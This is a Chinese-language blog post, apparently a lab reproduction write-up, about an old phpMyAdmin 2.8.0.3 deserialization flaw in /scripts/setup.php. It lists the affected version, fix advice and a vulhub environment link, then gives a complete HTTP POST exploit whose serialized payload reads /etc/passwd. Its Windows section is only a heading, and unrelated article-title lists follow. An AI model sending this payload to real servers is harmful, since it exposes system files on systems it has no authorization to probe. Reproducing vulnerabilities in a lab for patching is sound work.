文章参考

http://www.mottoin.com/detail/521.html

https://www.cnblogs.com/xhds/p/12579425.html

虽然是很老的漏洞，但在内网大部分都是用着老版本，在外网存在的也为数不少

漏洞文件

/scripts/setup.php

影响版本

已知版本为 2.8.0.3

修复建议

尽快升级到最新版 将setup.php中28行中的"configuration"改为传入其他值 直接删除scripts目录，防止被恶意攻击。

环境搭建

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

复现

1.构造EXP  （Linux版）

POST /scripts/setup.php HTTP/1.1

Host: your-ip:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

2. 构造EXP  （Windows版）

最新文章

1. JQuery（2）
2. [CareerCup] 6.6 Toggle Lockers 切换锁的状态
3. 结构体struts的长度
4. Maven入门学习，安装及创建项目
5. 系统中使用frameset和Iframe刷新页面session失效
6. powershel连接数据库监控数据库状态并发报警邮件
7. 在jsp页面中使用自定义标签
8. L10 安装网卡驱动
9. 抽象工厂模式firstones
10. Ultra-QuickSort(树状数组求逆序对数)
11. Linux增加开放端口号
12. 【XSY3344】连续段 DP 牛顿迭代 NTT
13. Python面试真题第二节
14. __x__(26)0907第四天__文档流_网页最底层
15. 如何在优雅地Spring 中实现消息的发送和消费
16. 15、JDBC-CallableStatement
17. VS2017中用C#调试DLL
18. [APIO2012]派遣
19. 线程：生命周期、实现方式、start()和run()的区别!
20. C#截取字符串按字节截取SubString

热门文章

1. log查看工具log2console
2. redis如何实现高可用【主从复制、哨兵机制】
3. 递归实现jsonTree
4. HTTP笔记1--Web及网络基础
5. Yocto项目介绍及入门 -- 嵌入师工程师必备利器
6. 在kubernetes集群里集成Apollo配置中心(5)之dubbo服务消费者连接apollo实战
7. vuepress & package.json lock version
8. Oh My Zsh All In One
9. UIKit and SwiftUI
10. prefetch vs preload vs prerender vs preconnect All In One